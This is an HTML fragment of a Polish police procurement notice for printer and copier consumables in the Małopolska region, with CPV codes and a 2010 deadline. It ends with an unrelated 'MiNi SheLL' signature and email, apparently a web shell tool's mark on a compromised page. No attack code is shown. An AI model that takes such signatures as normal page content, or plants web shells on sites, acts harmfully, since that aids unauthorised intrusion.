<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek i faksów dla jednostek Policji woj. małopolskiego - atramentowych wkładów drukujących, zespołów bębna, głowic drukujących, taśm, kaset z tonerem, zestawów do napełniania.
2.	Szczegółowy opis przedmiotu zamówienia zawierający ilość i asortyment zamawianych materiałów stanowi załącznik nr 2 do  SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.12-9, 30.12.51.00-2, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com